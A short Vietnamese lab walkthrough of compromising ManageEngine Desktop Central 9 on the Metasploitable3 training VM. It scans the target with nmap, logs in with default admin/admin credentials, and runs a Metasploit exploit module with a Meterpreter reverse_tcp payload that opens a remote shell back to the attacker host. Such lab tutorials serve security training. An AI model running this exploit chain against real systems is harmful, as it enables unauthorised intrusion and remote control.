Metasploitable3: Khai thác ManageEngine Desktop Central 9

Thăm dò máy mục tiêu bằng lệnh Nmap: nmap -sV -p- 192.168.2.21

Trong đó: -sV: xác định phiên bản dịch vụ đang chạy trên cổng, -p-: scan toàn bộ port.

Các kết quả quét cho thấy rằng máy mục tiêu đang chạy rất nhiều dịch vụ, bao gồm một dịch vụ Apache HTTPD trên cổng 8383.

Tiến hành truy cập thử vào https://192.168.2.21:8383 thì ta truy cập vào được ManageEngine Desktop Central 9

Đăng nhập với username: admin / password: admin

Khi đăng nhập xong ta sẽ được chuyển tới trang quản trị viên Desktop Central 9.

Tiến hành khai thác lỗ hổng bằng Metasploit

Gõ msfconsole tại terminal để mở Metasploit

Lệnh search manageengine desktop central 9 để tìm module.

Lệnh use 1 để chọn module exploit/windows/http/manageengine_connectionid_write tiến hành khai thác.

Sử dụng lệnh : Show options sẽ cho chúng ta 3 sự lựa chọn

RHOSTS : Địa chỉ IP Chủ

RPORT : Cổng mà giao diện web ManageEngine Desktop Central đang chạy.

TARGETURI: Đường dẫn cơ sở cho giao diện web ManageEngine Desktop Central.

Giữ các giá trị TARGETURI và RPORT mặc định. Chỉ đặt tham số host đích bằng cách chạy lệnh sau: set RHOSTS 192.168.2.21

Cuối cùng chỉ định payload với các lệnh sau:

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.2.20

Gõ lệnh run để tiến hành chạy Metasploit

Thành công xâm nhập vào máy mục tiêu.